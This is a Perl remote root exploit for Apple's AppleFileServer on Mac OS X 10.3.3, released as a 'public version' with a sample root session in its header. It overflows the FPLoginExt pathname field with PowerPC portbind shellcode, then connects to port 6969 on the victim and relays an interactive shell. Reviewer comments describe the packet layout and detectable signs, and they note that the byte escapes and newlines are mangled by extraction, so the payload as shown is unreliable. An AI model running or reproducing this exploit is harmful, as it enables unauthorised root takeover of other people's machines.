#!/usr/bin/perl
# Priv8security.com remote root exploit for AppleFileServer.
# PUBLIC VERSION!!!!
#
# Bug found by Dave G. and Dino Dai Zovi.
# URL: http://www.atstake.com/research/advisories/2004/a050304-1.txt
#
# [wsxz@localhost buffer]$ perl priv8afp.pl -h 10.4.12.199 -t 0
# -=[Priv8security.com Apple File Server remote root exploit!]=-
#
# [+] Using target: MacOSX 10.3.3
# [+] Using ret: 0xf0101cb0
# [+] Sending Request Opensession... DOne!
# [+] Got response packet:
# Flags: 1 Cmd: 4 ID: 31337
# [+] Sending FPloginEXT packet... DOne!
# [+] Waiting... We got in =)
#
# ****** Welcome to 'Adriano-Limas-Computer' ******
#
# Darwin Adriano-Limas-Computer.local 7.3.1 Darwin Kernel Version 7.3.1: Mon Mar
# 22 21:48:41 PST 2004; root:xnu/xnu-517.4.12.obj~2/RELEASE_PPC Power Macintosh powerpc
# uid=0(root) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty),
# 5(operator), 20(staff), 31(guest), 80(admin)
#
##########################################################################################
# Main script: builds one DSI/AFP login request carrying an oversized
# pathname field, sends it to an AppleFileServer, then connects to a
# second TCP port on the same host and relays that connection to the
# terminal. Everything below runs at file scope.
#
# NOTE(review): the string literals in this listing appear mangled by
# extraction (`x00`, `n` and similar tokens where byte escapes and
# newlines were evidently intended), so the byte values, printed messages
# and payload as shown here are not reliable for signature or IoC
# purposes; only the packet structure and control flow can be read
# from it.
use IO::Socket;
# Options: -h host, -t index into @targets, -p port, -o return-address
# offset. Defaults below: port 548 (AFP over TCP), offset 0.
use Getopt::Std; getopts('h:t:p:o:', %args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'t'})) { $target = $args{'t'}; }
if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;}
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}
# Target table: [description, return address, "magic size"]. The third
# value is later packed into two bytes and patched into $packet at
# offset 63 (see the substr() call after $packet is built).
my @targets = (
# description, ret, Magic size.
["MacOSX 10.3.3", 0xf0101cb0, 4], #tested on my ibook g4
);
print STDERR "-=[Priv8security.com Apple File Server remote root exploit!]=-nn";
# Both -h and -t are mandatory; Usage() prints help and exits.
if (!defined($host) || !defined($target)) {
Usage();
}
($desc,$ret,$msize) = @{$targets[$target]};
print STDERR "[+] Using target: $descn";
print STDERR "[+] Using ret: 0x" . sprintf('%lx', $ret + $offset) . "n";
# Payload bytes, attributed by the author to a third party. The author
# labels it "portbind"; presumably it opens the listener that the
# connect to port 6969 further down relies on -- not verified here.
$shellcode = # portbind shellcode by br00t [at] blueyonder.co.uk
"x7cxa5x2ax79x40x82xffxfdx7dx68x02xa6x3bxebx01x70".
"x39x80x01x70x3bxdfxffx88x7cxbex29xaex3bxdfxffx89".
"x7cxbex29xaex3bxdfxffx8ax7cxbex29xaex3bxdfxffx8b".
"x7cxbex29xaex38x6cxfex92x38x8cxfex91x38xacxfex96".
"x38x0cxfexf1x44xffxffx02x60x60x60x60x7cx67x1bx78".
"x38x9fxffx84x38xacxfexa0x38x0cxfexf8x44xffxffx02".
"x60x60x60x60x7cxe3x3bx78x38x8cxfex91x38x0cxfexfa".
"x44xffxffx02x60x60x60x60x7cxe3x3bx78x38x8cxfex90".
"x38xacxfex90x38x0cxfexaex44xffxffx02x60x60x60x60".
"x38x8cxfex90x38x0cxfexeax44xffxffx02x60x60x60x60".
"x38x8cxfex91x38x0cxfexeax44xffxffx02x60x60x60x60".
"x38x8cxfex92x38x0cxfexeax44xffxffx02x60x60x60x60".
"x38x0cxfex92x44xffxffx02x60x60x60x60x39x1fxffx83".
"x7cxa8x29xaex38x7fxffx7cx90x61xffxf8x90xa1xffxfc".
"x38x81xffxf8x38x0cxfexcbx44xffxffx02x41x41x41x41".
"x41x41x41x41x2fx62x69x6ex2fx73x68x58xffx02x1bx39".
"x41x41x41x41";
# pack('l') uses host byte order; reverse() flips it, presumably to
# produce the big-endian layout of the PowerPC target -- confirm on a
# big-endian host before relying on this.
$bin_ret = reverse(pack('l', ($ret + $offset)));
# Overlong "pathname" body: 141 filler bytes, the return address, more
# filler so that filler + payload totals 824 bytes, the payload, then
# 100 trailing 'A's. This is the field that overruns on the server.
$buffer = "x60" x 141;
$buffer .= $bin_ret;
$buffer .= "x60" x (824 - length($shellcode));
$buffer .= $shellcode;
$buffer .= "A" x 100;
# DSI open-session request: flags byte 0, command byte 4, then the
# request ID and zeroed remainder of the 16-byte header.
$req =
"x00x04".# Request Opensession
"x7ax69x00x00x00x00x00x00x00x00x00x00x00x00";
# DSI command (command byte 2) wrapping an AFP FPLoginExt (0x3f). The
# declared user name is 7 bytes; the pathname length field (0x80ff)
# vastly exceeds what follows in any legitimate request -- from a
# defender's view this mismatch, on an FPLoginExt, is the detectable
# part of the exchange.
$packet =
"x00". # Request
"x02". # Command
"x7ax69".# leet ID
"x00x00x00x00".# Data Offset
"x00x00x04x00".# Length
"x00x00x00x00".# Reserved
"x3f". # FPloginext
"x00". # Pad
"x00x00". # Flags
"x0ex41x46x50x56x65x72x73x69x6fx6ex20x32x2ex31".# Version
"x10x43x6cx65x61x72x74x78x74x20x70x61x73x73x77x72x64". # UAM
"x03". # Type
"x00x07". # User Len
"x41x64x72x69x61x6ex6f" .# AFPNAME USER
"x03". # Pathtype
"x80xff". # Path Len
$buffer. # Evil String
"x00"; # Pad
# Patch the per-target "magic size" (two bytes, host order reversed)
# over bytes 63..64 of the packet.
$len = reverse(pack("S", $msize));
substr($packet, 63 , 2, $len);
# Session setup: send the open-session request and show the first 128
# bytes of whatever comes back.
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "[-] Cant connect: $!nn";
print STDERR "[+] Sending Request Opensession... ";
$f->send($req);
print STDERR "DOne!n";
$f->recv($crap,128);
if($crap){
print STDERR "[+] Got response packet:n";
parse_packet($crap);
}
print STDERR "[+] Sending FPloginEXT packet... ";
$f->send($packet);
print STDERR "DOne!n";
print STDERR "[+] Waiting... ";
# Fixed 5 s wait, then a second connection to TCP 6969 on the same
# host. A new listener appearing on an AFP server right after an
# FPLoginExt is the observable side effect of this script; failure to
# connect is treated as "did not work".
sleep(5);
$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>6969,Type=>SOCK_STREAM,Reuse=>1)
or die "No luck :( $!nn";
print "We got in =)n";
$sc->autoflush(1);
sleep(2);
# Initial commands written to the remote side; their output is what
# the sample session in the file header shows.
print $sc "echo;echo "****** Welcome to '`hostname -s`' ******"n";
print $sc "echo;uname -a;id;echon";
# Simple relay: parent copies socket -> STDOUT, child copies STDIN ->
# socket; when the socket closes the parent terminates the child.
die "cant fork: $!" unless defined($pid = fork());
if ($pid) {
while(defined ($line = <$sc>)) {
print STDOUT $line;
}
kill("TERM", $pid);
}
else
{
while(defined ($line = <STDIN>)) {
print $sc $line;
}
}
close($sc);
print "Good bye!!n";
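sub parse_packet
{
    # Print the three leading DSI header fields of a server reply:
    # the flags byte, the command byte and the 16-bit request ID.
    #
    # $buf - raw bytes received from the server; 4 or more are expected.
    #        A shorter buffer leaves the missing fields undef, as before.
    # Returns the value of print(); the caller ignores it.
    my ($buf) = shift @_;
    # Unpack straight from the buffer instead of first splitting it into
    # a per-byte array and indexing that array with one-element slices
    # (@packet[0]), which only worked by accident and warns under
    # 'use warnings'. 'n' is network (big-endian) order, matching the
    # two-byte concatenation the original performed.
    my ($flags, $cmd, $request_id) = unpack('C C n', $buf);
    print " Flags: $flags Cmd: $cmd ID: $request_idn";
}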
sub Usage {
    # Print the option summary and the numbered target table to STDERR,
    # then exit the process. Reads the file-level @targets list; never
    # returns to the caller.
    print STDERR "Options:
-h Victim ip.
-t Target number from list.
-p Port to attack.
-o Offset, try in steps of 500.nn";
    print STDERR "Targets:n";
    for my $idx (0 .. $#targets) {
        # Only the description (first element) of each entry is shown.
        my ($description) = @{ $targets[$idx] };
        print STDERR " $idx - $descriptionn";
    }
    print STDERR "nUsage: perl $0 -h Victim -t targetnn";
    exit;
}